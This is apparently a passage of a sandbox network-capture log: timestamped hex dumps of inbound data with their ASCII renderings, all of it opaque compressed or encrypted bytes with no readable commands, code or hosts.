                                                                                                                                                2022-09-29 12:51:28 UTC5551INData Raw: d4 e6 99 5f ec 42 68 a4 14 26 6c d5 d7 ca 04 d1 da 21 a8 77 ca 42 65 56 84 df e8 fb a1 35 e7 7b 47 7b 8d 2b e6 de 9f 46 aa 15 7c 87 39 e7 86 e7 81 79 1c e6 9f 79 83 17 fe fc 53 28 16 64 74 00 a0 05 71 fe ee 16 49 b3 cf 18 07 c0 dc 5b 6f b4 41 fd 1a 2c 7f 66 b8 0d b7 ce ba d9 40 45 3e fc e5 7a 62 37 5c 56 19 46 de 4c 3f 2e 7c 85 4a 03 9f 36 d8 bd a8 9e 3f d3 01 13 bf 66 d9 cb ae 54 9c 26 f2 cb 49 b3 48 8e 99 c4 fc 9c 17 ef 30 c0 c5 14 8c a4 61 66 9b c1 58 d6 29 1f d2 76 d3 d1 81 68 69 87 e0 61 21 7a f6 ec 60 1a 28 e3 f1 14 f4 55 a2 41 5a a3 a0 7c f5 57 9e 26 ce 00 7e e5 d5 9e dd cf ac f8 4d 44 2d 31 84 2a 82 0b 42 be 95 a0 67 c9 2c 77 e6 7f d0 f8 23 ab 88 d7 00 5e 5c 13 7f 84 c7 30 92 7d 78 15 01 4b 6a ec 42 86 b4 2c 27 ae 57 7d fb 5a 38 a8 6a 9b db bd 79
                                                                                                                                                Data Ascii: _Bh&l!wBeV5{G{+F|9yyS(dtqI[oA,f@E>zb7\VFL?.|J6?fT&IH0afX)vhia!z`(UAZ|W&~MD-1*Bg,w#^\0}xKjB,'W}Z8jy
                                                                                                                                                2022-09-29 12:51:28 UTC5567INData Raw: c4 e8 a9 3f d9 c1 23 0c 30 77 d7 6e 05 b6 59 08 25 be 39 6e 56 cf 78 29 25 64 81 1a 85 f6 ee d2 9c 94 c2 0f bf 70 f7 d7 31 c5 7f 39 46 b3 60 1b 37 33 a0 d7 98 54 5d de bb 87 b9 0c ec 69 8c 2b e5 8e bb dd 2c a0 9c 80 61 38 ed c1 45 2e be 34 ac 1b c1 4b 63 b3 8b d7 56 a4 b4 60 7f c8 b4 ac 48 6c 32 73 0b d2 2e 86 e2 d2 29 99 68 30 95 b4 32 98 41 6d e5 76 cc c1 18 38 63 b9 4b 8a a9 c0 90 2f 44 6c ce 88 12 e7 64 18 e5 00 08 bd cf d3 fa 34 38 fb a3 8f cb b0 60 df fb 30 37 23 a7 2c 89 eb 8e db f0 d5 5a b3 0f 6f c1 5e 00 34 0d 41 9a 40 d6 b2 fb b8 82 fb b8 f6 04 cb a7 c1 86 4c fe 0a c2 d4 4a a0 aa 13 89 0b ee 0d 6d 5a 60 3f bb fa 55 a6 a1 2e 50 e5 3d b0 a4 42 d4 93 95 7e c5 e7 6f f2 4c f6 ff d8 fa 0f d4 9e af ee 7c 58 76 5c b3 1d f4 55 4b 53 4c 6f 0c 1b a6 70 12
                                                                                                                                                Data Ascii: ?#0wnY%9nVx)%dp19F`73T]i+,a8E.4KcV`Hl2s.)h02Amv8cK/Dld48`07#,Zo^4A@LJmZ`?U.P=B~oL|Xv\UKSLop
                                                                                                                                                2022-09-29 12:51:28 UTC5583INData Raw: 35 1d 60 c4 d9 21 2d 71 8f 7b 5f 21 5e d5 68 f7 51 08 47 3b 65 6a 35 3c d7 e5 cd fb ac 1a 43 a2 ba 4e 54 fb f2 f1 e1 2d 14 34 f6 c3 07 88 61 3b ed b4 e5 69 16 b6 97 92 22 6d c9 e3 47 6f 60 ff e6 02 e4 f2 eb 31 ab 34 86 6e 20 06 57 62 64 4e 4c e7 aa 17 6c 42 2d 8c 89 53 d2 2c 1e 0b 00 2f 92 e9 01 01 65 8a 1b ca df 7f 3d bf 7b 65 c7 7b af 1c 02 7b 76 62 42 4e b7 38 62 a9 2e a5 21 f2 98 24 40 1f 44 55 3b 63 a1 38 f1 8e c0 c5 53 a1 ed d3 a5 59 22 aa 96 09 ce 8f 9a 57 f9 70 42 3c 03 c7 c7 4e b5 65 a6 b8 d4 87 e2 64 46 f6 46 fa a9 e4 7c be 46 39 c3 83 c4 41 9f 23 38 9b 04 46 3b f0 89 b2 e7 9e 75 7c 8a 06 0d d6 73 d9 da 4a 2e 1e 0d 9a 45 d0 1b e8 e5 af cd 84 e3 50 7d 4f 5b 68 2a d4 5f b2 3b 80 b9 ba 09 71 de 2f 6a 42 09 2f f1 09 cc f8 11 d6 41 f8 d6 f0 cd 05 d4
                                                                                                                                                Data Ascii: 5`!-q{_!^hQG;ej5<CNT-4a;i"mGo`14n WbdNLlB-S,/e={e{{vbBN8b.!$@DU;c8SY"WpB<NedFF|F9A#8F;u|sJ.EP}O[h*_;q/jB/A
                                                                                                                                                2022-09-29 12:51:28 UTC5599INData Raw: 1d 33 14 6d dc d3 4e 90 bc c6 d7 51 43 ca be 14 a6 a7 ec eb 3d df d3 95 8c aa 80 85 9b c9 18 45 cd 51 4c 6f 5a cb 49 42 fe 19 b3 e2 3e 45 5b 0a 6f 46 ac c0 64 da 66 15 42 fd 56 d2 89 d2 51 84 6f 2a cb a5 eb b7 c5 0d 11 32 1f 18 1a d7 d7 27 a0 13 12 8f 25 c6 61 7d c5 1f 90 df 37 34 78 1e c9 e4 7c 39 87 0c 07 14 2c f6 15 85 2a 65 19 a6 85 e0 63 e4 fa 89 96 a5 29 a0 92 9c 20 b1 09 a5 31 6a 41 21 80 c9 e2 2e a1 18 35 eb 0e 21 6b 9e aa 11 ef 7e 0e c6 97 26 00 a2 05 d3 cf 50 99 1f 25 da 18 9d 58 1e ef f4 82 23 fd 59 9c 94 7c 2d 47 7e f8 6d ba 2a 48 83 5d 22 bf 4a a8 81 ed d7 7f db fa 2c 62 43 b9 e9 17 0e 85 d9 67 07 aa 0b b8 d6 39 2f 77 7a d5 dc be f8 eb 99 d6 74 76 a4 c8 00 04 07 03 cb bb 86 50 a6 2b 69 2f 79 5b 45 9e 7d d1 a5 2f a8 63 5c 1b a3 0f 7d 7a 9d 45
                                                                                                                                                Data Ascii: 3mNQC=EQLoZIB>E[oFdfBVQo*2'%a}74x|9,*ec) 1jA!.5!k~&P%X#Y|-G~m*H]"J,bCg9/wztvP+i/y[E}/c\}zE
                                                                                                                                                2022-09-29 12:51:28 UTC5615INData Raw: 82 da 03 86 63 cc 47 1e 37 22 5c b9 ef c4 59 ae 46 2b a4 74 d4 85 0d b1 a4 c0 68 36 9c 80 20 4e 13 5b ca ed 6b 96 e6 47 1b 32 dd 23 7c 5c a2 d1 f0 9e e4 67 d3 69 b4 97 60 e3 63 29 a7 26 d7 c4 33 22 da 86 19 6f 24 60 b1 a5 e5 15 a8 34 40 38 b4 78 c8 6f 61 83 a9 ef 25 f0 f7 a9 65 5b 14 ca 16 33 38 83 eb 87 a5 21 ab a7 c3 51 53 45 49 80 a7 10 ea 9c 0c 6c 3a 51 8a 41 2f 21 d4 48 f8 cd b3 85 d8 f8 13 61 94 83 39 c2 f1 e6 35 13 cc 49 8f 3e 2b 36 ad 51 8d 2a de b7 3a b5 33 e2 36 0b bc ae 3e 84 dc c3 92 68 39 d3 fe 23 11 d7 e0 30 09 d0 83 2f cb 68 75 50 0c 14 e3 07 22 cd 75 ee fd 9a 4e c8 ec ae 48 f2 b8 67 fb ba b7 b5 84 8d 84 4e 0c cc 84 59 0f 81 f1 a2 02 0c f5 1e b1 9f 7e 71 c1 8b 9f af 11 12 cc 9b 07 5c f5 38 fc 4e d9 44 5c 80 11 a7 ac eb c0 8f f6 30 88 dd 78
                                                                                                                                                Data Ascii: cG7"\YF+th6 N[kG2#|\gi`c)&3"o$`4@8xoa%e[38!QSEIl:QA/!Ha95I>+6Q*:36>h9#0/huP"uNHgNY~q\8ND\0x
                                                                                                                                                2022-09-29 12:51:28 UTC5631INData Raw: e1 47 c2 c4 69 29 cb 8c bf a2 29 2a f0 94 9b 5c 0f fa 6a e2 c1 08 10 be be 1c 06 f4 1c dc ee e4 0a ee 22 04 f0 82 9e ef ff d0 93 f3 25 8c 38 8d 69 04 4f 87 3a 4d 40 de 36 d2 1b 31 26 1e 48 25 d6 23 4b 47 18 ea 13 28 fa 51 6d 2c f8 ea 76 20 39 ed f9 54 29 5c 76 d8 7f 12 ff 51 44 a0 09 03 50 60 fc 4f 4a 92 66 9a 7d 11 11 39 d3 3f a4 79 be d1 d1 c8 b9 d8 0f 00 11 bd 74 34 7e d0 1d b0 7b a7 94 4d b0 f2 3b d9 30 36 20 eb de 31 88 64 3f fc 54 3f f0 1b 22 0b 3c 26 0d 9d 59 07 13 33 f8 87 8a a4 7e 97 cb db e9 a8 03 49 ed 41 bb f0 d0 3f 6e d4 1e 3e cd 02 cb 07 b3 4e cd 65 51 cb b7 01 84 33 c6 cd 31 cb 5b 04 65 0f ad 93 8b b7 a6 53 b6 78 22 60 45 c1 64 0f f9 7c ab f3 04 86 d8 e7 4c 66 f3 05 47 6f a5 49 aa cf d2 79 e5 6c df 91 e9 c6 7b 0b 8a 51 21 36 13 61 94 a6 bc
                                                                                                                                                Data Ascii: Gi))*\j"%8iO:M@61&H%#KG(Qm,v 9T)\vQDP`OJf}9?yt4~{M;06 1d?T?"<&Y3~IA?n>NeQ31[eSx"`Ed|LfGoIyl{Q!6a
                                                                                                                                                2022-09-29 12:51:28 UTC5647INData Raw: 62 a0 f0 af 58 14 a3 2c 89 f8 71 e1 8f fa 36 69 6f 6a ab d8 77 2a 2a e8 da 3f de 97 7f 37 be 70 38 7f b6 d6 e1 bd 90 8d 6e 5f 26 c4 95 83 06 53 7e f8 8b 67 ca 00 16 d1 2b a3 bd e8 df b7 59 9c 3f 0c f5 da 06 13 e0 bc da 28 36 66 0d 4c c9 a8 7a 9c d0 d2 bf b0 50 48 20 59 d2 a0 b0 31 1e 6b 6c 4e 28 ac 0a de cc aa 3a 8e 29 e7 e4 0c 32 6f e2 c3 df 75 08 fb 02 ba dc 87 7f f2 ec 41 30 ac 1c 90 d1 df 74 99 9c 6f 8e cc f1 63 6a be 1d 5c cf ce 42 b1 fc 87 86 f7 63 b0 8e a6 ce 8b d8 3d 0d ca db b7 4c 14 9c 47 7e ed d2 84 c5 a2 1e 0d 3d 91 d8 49 fd d7 1f 0e 61 14 8c 39 71 84 72 0c 79 1d ad ef 51 46 b6 e1 75 33 bb 21 9d 19 0e b0 b9 7d 86 d4 4f 23 c4 1e f5 cd b7 38 cb 91 43 9b 25 f4 3f ee 32 e3 c3 d6 3d 96 f4 d9 8c e3 81 35 68 f4 7d d9 47 e3 97 96 89 e0 65 03 8a a4 cd
                                                                                                                                                Data Ascii: bX,q6iojw**?7p8n_&S~g+Y?(6fLzPH Y1klN(:)2ouA0tocj\Bc=LG~=Ia9qryQFu3!}O#8C%?2=5h}Ge
                                                                                                                                                2022-09-29 12:51:28 UTC5663INData Raw: cc 69 8a 04 73 d4 c8 83 c1 88 f1 38 f4 f3 eb 9e b9 3a 25 ee 41 71 77 95 eb 38 8f d2 59 18 bc a3 a5 ae 3e 8a 98 73 1e 02 f7 33 28 69 9a 2f af 66 44 d4 75 d7 63 66 ec 08 a8 91 50 6a 13 73 67 7b 7a d2 d5 87 b6 7c 9b de 24 26 df 02 43 b7 b9 9d 74 c8 0f b3 92 df aa 80 69 f0 75 03 ab 4b 66 d5 e9 1e c9 98 f7 63 3e 54 ca 51 2e e5 53 04 6e 88 11 45 76 d2 06 f6 62 b9 b7 c6 30 05 5b 2a 2c d4 33 72 dd 39 8a 08 9e 2f 56 57 f5 9b 46 e4 39 50 76 70 92 37 ec b0 2a 43 df 1b 50 af 83 8d 24 8a cb ac 85 2b 4c 4c 5b 51 87 61 1d 26 c8 c2 a4 c2 b0 12 a6 20 b4 16 e6 11 4a 69 5c 5c 89 fd 73 66 b9 f1 d8 a7 ff 30 0f 33 3e ad e1 f1 40 99 d5 ac fd b5 1e 8e 78 55 52 c6 4b 61 b7 db 7e 54 96 07 8c 90 ce 20 e0 d5 fd cb 75 1d 79 37 8f 48 c4 4d 2d 8b c5 72 c1 32 6f e4 52 fc af e8 92 f9 45
                                                                                                                                                Data Ascii: is8:%Aqw8Y>s3(i/fDucfPjsg{z|$&CtiuKfc>TQ.SnEvb0[*,3r9/VWF9Pvp7*CP$+LL[Qa& Ji\\sf03>@xURKa~T uy7HM-r2oRE
                                                                                                                                                2022-09-29 12:51:28 UTC5679INData Raw: ab 29 55 f1 4f 83 ce 85 47 28 cb 04 2e 0e cc 1c 6d 10 93 bf 4d 27 05 8c 1e aa c9 8e 15 da 6a 0b e1 3d 8f 00 b7 fc cd 22 7a 72 d0 03 68 f8 07 2d 17 c8 dd 17 a6 c4 7b 35 a6 3e ab 81 01 9f 2f c0 4f cf 0e 15 01 50 3a ee 62 4c 5d 43 a6 03 92 65 53 7b 96 71 a7 96 17 fa b7 23 db 35 80 29 71 1c 2f b3 ae fa e0 fe 92 d1 05 8c 73 31 19 b8 2f ca 28 a4 dd b3 1e af a7 b1 0c 0c e7 ee b5 40 f7 27 01 6b a6 d7 f5 0e 59 c4 1f 28 5b 8a ba 1d 99 df c3 fc 17 a2 8c 71 00 24 64 0b b7 a0 f2 68 91 93 20 93 58 b3 13 20 9c 04 de e4 1c 5a ef 96 2b 7b e8 96 06 b2 bd 00 90 3d 63 68 60 3a 71 d5 f6 26 03 31 f9 70 b8 a3 7d 0e d4 46 d2 f0 0b 10 a4 64 96 c6 7d 15 08 5d ca dc 38 4f a7 1a 23 ca 64 77 eb a8 01 78 c3 25 aa 98 6f de 5c 7e d9 ed 2c 47 61 8c 14 68 52 63 c2 34 5e c0 b9 47 be e7 5e
                                                                                                                                                Data Ascii: )UOG(.mM'j="zrh-{5>/OP:bL]CeS{q#5)q/s1/(@'kY([q$dh X Z+{=ch`:q&1p}Fd}]8O#dwx%o\~,GahRc4^G^
                                                                                                                                                2022-09-29 12:51:28 UTC5695INData Raw: c6 5f 55 bd b2 bb f7 d3 a5 f2 70 1c a3 dd 24 70 0b 02 43 e0 fc 8f d8 5e 2d 7b 01 64 4f 6a c2 ee 67 d1 0f ee 7a 24 25 0f e6 bf fd fa 0f 37 5b 45 e9 f4 4c 2f 1e 6a 17 05 2d 98 48 fb 96 67 43 de bb 6a 5b ef 66 93 1b e5 25 f9 ca 19 78 43 44 21 03 c4 42 0f 4b 51 5b 2d e9 05 28 ad 2a 98 3a 32 b7 e9 12 29 0f 4f bf 6d 0b 64 72 e3 de b0 ea 3a 80 d8 75 98 b9 85 7e 16 49 c2 bc fe c7 1d 70 88 13 57 30 2f 6c 96 ce 91 7d de aa 79 ce 64 ef e4 80 e9 e9 7a 5a 4c 62 b5 af be fc 84 c6 7d da 2a 46 d6 e1 a9 ca 79 00 23 cf 39 55 1e 7a cb 71 94 47 32 ec 41 69 9c eb 74 d0 98 fa 98 0c 61 f3 8e 36 70 5f 22 20 96 48 a5 84 26 6f f1 06 e2 55 4a bb 41 b4 b0 c8 d1 b6 c3 86 32 aa 4a 61 e0 76 3d 94 dc 19 c0 d9 3e d2 b9 3f b8 55 63 94 b1 79 61 69 eb 44 c8 29 e2 f8 f0 0a 7b b2 66 45 26 95
                                                                                                                                                Data Ascii: _Up$pC^-{dOjgz$%7[EL/j-HgCj[f%xCD!BKQ[-(*:2)Omdr:u~IpW0/l}ydzZLb}*Fy#9UzqG2Aita6p_" H&oUJA2Jav=>?UcyaiD){fE&
                                                                                                                                                2022-09-29 12:51:28 UTC5711INData Raw: 39 d7 4a cd c5 0e 9a 85 b2 5f 55 ea e3 c6 80 fe a4 c4 d3 e9 51 65 7b a8 d0 44 25 dd b4 d2 00 fb b1 db 96 00 5e b9 b3 40 43 16 9d 4a 02 a0 c9 61 e0 7e e9 97 6d 45 86 8f 15 cf bd b1 37 3b 7a 63 3a a4 d6 58 d8 f1 0c 7f d7 c2 1a 9c b6 c6 5c 8e 81 9a 8d 49 9f 5a b7 b2 13 23 cf 70 0a 4a 94 1f 2c 8a 13 73 9c 95 27 40 a8 76 4b 34 a8 a1 b7 16 b0 4d 25 6e 1b 5e 3a 03 67 f0 75 a8 6b 7b 07 a9 a7 be dd 56 bb 34 ec 90 cb 11 3f c8 ee ec b9 5c 85 20 5f c2 ab 10 a0 82 86 67 fb 3c 5d 8c 64 e9 e9 7d bc fe be fe d2 f6 f3 cd 53 6f 3f 9f 01 37 72 b5 68 b0 8c 60 9d 3a 11 ab e6 bc e7 c7 ac 64 97 f6 02 0a 96 5f 66 3c dd 20 78 b7 70 36 b6 7e 8d 91 76 9f 25 c8 e5 8d d2 4c 5f fa 3b 4c ed d4 f3 ca cb 61 fb b8 9f e7 ce 04 79 37 b1 42 ef 7e 7c 45 a8 75 5f 2c 29 56 1a ef 39 c2 4c db ae
                                                                                                                                                Data Ascii: 9J_UQe{D%^@CJa~mE7;zc:X\IZ#pJ,s'@vK4M%n^:guk{V4?\ _g<]d}So?7rh`:d_f< xp6~v%L_;Lay7B~|Eu_,)V9L
                                                                                                                                                2022-09-29 12:51:28 UTC5727INData Raw: 39 94 d3 e6 53 7a 5f 38 7a 04 0c 25 76 fe 5c b8 ab 8c 09 2d 3a 4a 48 ab f9 2a e8 08 87 e2 3e 42 ad 05 a7 2e 39 72 e3 b8 1d 90 df 1d 92 8d 15 e6 fc b7 ef ce a1 28 a5 7a a7 44 98 47 83 5f a5 0e 54 dc 7d aa 20 a1 3f b6 5e 91 8e a6 92 11 73 61 71 36 e5 c1 c2 f5 87 43 a9 68 34 0a c4 fb d2 33 50 83 bd fd 8b 8b ba 11 2f 1f 2e 6b c5 2e e5 b4 04 56 72 0c 36 5e 70 83 3a 0b bc 3d 83 af a3 b0 6d 77 42 ea b3 17 1c fc d7 ff 24 ba f0 07 04 98 4f 3c b3 08 3d 79 c6 f2 64 1e 99 f8 ac 59 ab b1 a5 c5 13 cf 98 90 12 c6 f3 8a 7b 2e 64 5b 69 7e 2a 33 29 cd 67 29 21 e2 ef 95 1c ce 4b 3f 43 66 68 fe 66 30 7d d3 ad 17 f1 f8 27 86 08 ef 94 9f f6 93 b5 01 3c 59 85 46 b1 d9 7b 11 96 7e b5 ec 28 13 63 13 56 b5 74 40 75 ff fb f2 e0 7d 23 e9 8f d0 c1 6e 05 e5 61 86 70 24 40 45 3d 42 e0
                                                                                                                                                Data Ascii: 9Sz_8z%v\-:JH*>B.9r(zDG_T} ?^saq6Ch43P/.k.Vr6^p:=mwB$O<=ydY{.d[i~*3)g)!K?Cfhf0}'<YF{~(cVt@u}#nap$@E=B
                                                                                                                                                2022-09-29 12:51:28 UTC5743INData Raw: 1b ea 3e 5e 24 b6 4d 7f 38 e3 da 22 1e 68 93 5a ed f0 cb 2d 9d 46 56 42 6c 9e 04 b4 ff 03 e0 c1 cc eb 03 ad 18 fd eb 27 a9 fc 54 27 6c b3 86 7e 61 1f c6 d9 10 ff 55 fd 78 f7 12 7b d1 41 c7 d9 4c c7 41 83 92 29 76 18 ad e6 6b 30 fb fc f8 c0 22 42 df 1f 01 a9 58 fb 3d c2 94 01 96 f8 46 4e 5e 10 b7 ba 39 08 c1 79 90 64 bc 20 e4 fb d7 ea 99 86 35 ff 79 2b bd d2 79 02 0a 8a 6f 8d f4 a2 4c 15 16 4f 9a a9 b4 43 ee d6 5a 1b 04 eb f8 b2 db 59 06 36 c6 e5 07 b1 b1 a3 81 32 a3 39 6e f8 9c 3e b8 80 64 df 40 b4 3e 69 0d 7d cf 6e a4 1c cc e6 35 4d 6d 9a 6d 12 c7 44 6c f0 7c fa e2 ce 6b e7 bf 1f 43 74 79 10 ba 5e 1a 48 10 6a 11 da 98 77 ab fc 4c 90 2a 66 8b 13 aa e5 1c c0 1d ab 41 8d ec 2d 96 fe a1 07 b0 4e 40 0a ac a4 52 b7 76 f0 15 33 dd e2 12 21 8f d6 e0 53 4f e2 1f
                                                                                                                                                Data Ascii: >^$M8"hZ-FVBl'T'l~aUx{ALA)vk0"BX=FN^9yd 5y+yoLOCZY629n>d@>i}n5MmmDl|kCty^HjwL*fA-N@Rv3!SO
                                                                                                                                                2022-09-29 12:51:28 UTC5759INData Raw: 9f 92 b6 89 9d c4 ec f5 9a 3f ce 28 c6 ab a0 be 05 39 b1 4c e6 b1 16 85 1c 55 92 e7 05 c3 3d 3e ce b9 3d 2f 58 b6 77 b4 7a 8c 76 81 3c 04 2d 23 e4 2e f4 52 78 9f 31 57 15 51 41 36 32 28 03 a7 9a f0 75 10 b2 96 50 b4 b2 c9 6e c3 3f 1f d0 99 6a f8 bd 69 a5 4f a5 c2 04 d2 ac 18 8f af 02 a7 f4 5b 4d ea 08 80 75 2b 14 fd 0a 87 b5 e2 0a 45 58 2b 47 7c fb f1 5d 68 47 32 bd a5 9e 87 c1 96 e0 80 00 90 18 2e 81 13 cf 51 0f 05 da 31 95 df da 46 0f 8c 02 a5 ef 4c 88 0c 0e 5c 6f 01 6e 50 6c f0 dd e2 06 23 33 c3 de e7 fb 7c de e6 bb ea 3b 39 12 a1 73 07 8d b8 50 1a 3a 5b c8 58 2f 7a 69 9d c7 be 61 b4 0f 23 86 a9 6e f8 22 7a e1 17 ac 39 33 2d 1e 3d 9e 31 43 ac a5 da 56 53 3d d6 79 61 8a 16 36 6b 61 bb 79 78 89 17 78 47 18 67 35 d5 ec 49 0b 0a 09 93 6b 59 93 6e 95 4e 64
                                                                                                                                                Data Ascii: ?(9LU=>=/Xwzv<-#.Rx1WQA62(uPn?jiO[Mu+EX+G|]hG2.Q1FL\onPl#3|;9sP:[X/zia#n"z93-=1CVS=ya6kayxxGg5IkYnNd
                                                                                                                                                2022-09-29 12:51:28 UTC5775INData Raw: 3d 5f d7 80 30 aa 98 7d 56 9f 4d f3 01 a7 46 46 c1 87 1a a2 b9 04 79 75 48 fe 3c 2e 52 7b 55 5b d9 c4 7d 15 ed b4 ea 77 c2 4e 9c fb fa 94 fe bf b2 14 3a 73 65 60 dd 81 c6 51 bf 45 33 da 16 d5 7a b3 e7 ce 21 82 28 7b 10 54 c0 3e 45 3f 3e e6 42 2f b2 08 d7 ac e4 4f 9d 09 27 df ad a3 d6 3a e3 77 41 07 4b 7c 30 02 75 56 a1 53 98 ac 96 32 ae ca e9 f5 a4 85 f6 65 84 cb e3 1a 3d c0 7d ec 59 5e b3 26 1c b5 dd a3 38 48 de ec 6c aa 1f 60 16 44 b2 68 a7 df 44 42 19 e1 96 1c db cf f2 2e 35 f5 7f 7c cc 52 1c bb 0a 30 ca 01 db a6 6e 2e e5 99 f5 f1 03 40 70 54 93 71 53 06 c6 02 b4 e5 ce 4e 4d 88 9d 19 f0 b9 49 a7 a1 a8 78 33 e6 b4 4b b8 c2 83 fa d6 72 c6 3c 5e c9 4e 01 f7 70 91 79 88 fa 29 9b 07 cb b2 25 c3 a0 7b a7 17 43 0b 28 b7 f1 2f ba e7 a6 69 61 10 3a 8a d6 6e d4
                                                                                                                                                Data Ascii: =_0}VMFFyuH<.R{U[}wN:se`QE3z!({T>E?>B/O':wAK|0uVS2e=}Y^&8Hl`DhDB.5|R0n.@pTqSNMIx3Kr<^Npy)%{C(/ia:n
                                                                                                                                                2022-09-29 12:51:28 UTC5791INData Raw: e7 d9 86 ed b6 de 3d f1 d0 29 1b 75 11 aa b5 2e 83 ed da ef 18 81 eb e7 9e fe 8e 9d 42 67 6a fa 62 7b f1 e6 80 27 b6 4d e7 37 2e f4 cf 61 24 ee 07 ca 65 6f 20 16 2d 1e c9 ce 73 d7 2e b1 47 63 d1 3a e0 52 4f d0 47 d3 d7 02 c3 23 ef e1 a4 53 af 9c 44 98 e8 c9 c2 f9 0a 14 a9 fc d7 29 da 31 af a9 ff 25 49 cf a4 f7 d0 0a 95 71 f1 b9 d3 0c 35 74 8f 9c 03 3a a1 18 80 2c 11 42 44 fd 73 f2 b4 1c 84 33 c2 f1 0e 80 2e 3f 6c 39 28 b1 f3 f0 47 47 b9 16 81 55 ba c2 04 4d fb e0 0a 62 69 f7 a7 59 5a 2f dd 54 2c 1f 09 52 c9 8e 15 f1 2f 2c ad f1 ae f1 4b c4 45 59 ed cc bc bb cb af 87 07 de 29 82 0a 81 6f 74 24 1f b9 aa 5b 62 1c c6 42 9e cb 63 8a 35 89 c7 d4 d1 2f df 95 65 57 a3 71 bc 19 c8 46 66 d6 05 32 11 fc 30 64 ef 51 74 50 34 54 45 0a fc ce 33 db 93 1b 40 60 ca 11 97
                                                                                                                                                Data Ascii: =)u.Bgjb{'M7.a$eo -s.Gc:ROG#SD)1%Iq5t:,BDs3.?l9(GGUMbiYZ/T,R/,KEY)ot$[bBc5/eWqFf20dQtP4TE3@`
                                                                                                                                                2022-09-29 12:51:28 UTC5807INData Raw: 38 84 50 02 7f 03 3e 68 97 36 8e 3a 03 31 f2 de fd e7 32 bb 39 21 ef 18 48 1d 90 f4 35 35 0a a5 07 98 ce 34 ed b1 28 5f b4 57 7a fe 10 f3 27 ee 4e 3e ef 2d 88 70 64 97 e0 c8 c2 63 20 20 b7 aa 6b 69 35 b2 ec 7a 86 bf ca 87 0f 19 64 94 9c 6a a0 53 d5 1b 67 e9 12 8b da 7f 6d 9f 63 85 b8 bd 8d 29 13 f9 f4 fe dd e0 9e 40 4e 08 ef 76 d2 43 5c a6 6d b5 96 2d 4a 7a 2b 1c 4d 95 e1 ce 00 a7 9a fb 04 eb c3 84 8e 72 f3 3a 3b a0 79 a7 0e d9 f1 14 98 07 db 09 83 83 16 2a 3d b4 72 46 80 7d a6 9c 4e 74 8e 46 4f 1b 72 95 70 a6 fe 5d ca 48 eb 06 2b 8e a7 59 2b 7c 43 c4 b7 27 53 e0 cd 96 2c 4e 82 ef 86 2c f1 48 ef 6a 95 d9 1c f4 74 cb 82 68 6f f1 5e 97 3a e9 63 0f 23 ff 00 98 08 4e 20 45 90 99 c9 87 e5 80 46 40 af fc 1a b2 bf a7 5d 2e 0b c4 c7 fe ea b2 6d 5e 9e b4 1c b4 df
                                                                                                                                                Data Ascii: 8P>h6:129!H554(_Wz'N>-pdc ki5zdjSgmc)@NvC\m-Jz+Mr:;y*=rF}NtFOrp]H+Y+|C'S,N,Hjtho^:c#N EF@].m^
                                                                                                                                                2022-09-29 12:51:28 UTC5823INData Raw: 42 7d e3 9a 70 1f d7 9c 46 c5 5a 57 72 d9 f5 d5 8e 34 4c 2c 62 48 65 53 db 5b 2a ff 65 42 1b 2d 57 bb 91 72 99 3c 27 c0 e8 3e 5c a6 e5 8b 4f 8b 0b c1 cc f6 f7 22 7e 31 52 55 33 68 74 2a e9 cd fb bf cb a2 1b 21 13 dc 1a 32 45 ee 21 6b 47 40 28 7a e4 ae ca e3 f6 5f 70 60 98 15 ed 4c e6 9c 9a fe 80 98 8a 7b 50 6c fd b4 2b e7 98 9a d4 15 37 2c ba 08 ce 7a a4 8c 5b 66 3e c9 0b 9e 2d e2 17 cd 18 b3 fa 8f 1f 8d d6 63 e3 48 15 c5 3a b7 ad 45 b7 72 26 12 20 34 ab eb 31 04 34 c1 4a 8f b7 0a 81 dd 25 26 74 e7 d7 cc 29 16 a8 d4 3c d3 16 a1 16 7e 24 99 80 b7 d6 c8 a4 6e b9 b6 2e 44 bf 53 19 1e fc 8f 31 4d 78 62 fe b1 1f 6d 89 de fd 26 cc b4 e5 60 3a 05 7e 23 76 c1 e3 ff 46 94 25 78 9d be 76 55 d3 0f dd db f9 54 b1 7f 80 51 71 52 8e 45 19 67 71 52 44 a0 19 6e ec 25 95
                                                                                                                                                Data Ascii: B}pFZWr4L,bHeS[*eB-Wr<'>\O"~1RU3ht*!2E!kG@(z_p`L{Pl+7,z[f>-cH:Er& 414J%&t)<~$n.DS1Mxbm&`:~#vF%xvUTQqREgqRDn%
                                                                                                                                                2022-09-29 12:51:28 UTC5839INData Raw: 1d 37 b9 c6 48 29 34 0e b9 26 d4 7e 8d a6 5c 3a f3 c6 34 5a 2b a0 26 53 f3 da 50 25 20 b6 2d 1e f6 a0 be 4f 40 2a 69 eb 4b d3 6e b7 ef a6 83 5b b9 5e cb 5b 44 42 d1 c6 1b 37 ee f6 2b 6d 96 15 fa c6 4f cb 17 f4 20 ef f5 1f af 56 2d 0f 17 0e 60 25 d0 ea 63 79 b9 ec f0 c5 37 7a c0 94 6c ff a7 39 34 a5 d2 35 a5 dc 32 ab 27 d1 a6 a6 1e dc b4 a1 1d dd bd bf b4 e3 61 35 3f c3 d4 b4 f7 f2 41 04 8e 05 ac b6 c8 8c bd 75 84 0a 34 2f f0 1a 57 e3 d7 b2 e1 aa 87 79 ea ed 29 cd f0 b2 c1 ca de ee 0c 9e d1 72 56 63 4e 21 43 2e cd 2d f9 86 0c b3 2c da 41 52 4b 73 97 db 6d 1f 19 2c fe 00 de a2 e9 43 f6 1c 30 34 c3 79 70 6b e6 9b 23 b1 b9 99 f6 2e 9b 31 ce 59 c3 4a 95 01 ef 5f b3 2c 6e 97 a6 f1 9c 10 be f4 2b 6d 8d 60 b0 67 84 c0 c4 09 e3 3e 2a 2c e2 0a 1f a7 aa 67 6a b5 c7
                                                                                                                                                Data Ascii: 7H)4&~\:4Z+&SP% -O@*iKn[^[DB7+mO V-`%cy7zl9452'a5?Au4/Wy)rVcN!C.-,ARKsm,C04ypk#.1YJ_,n+m`g>*,gj
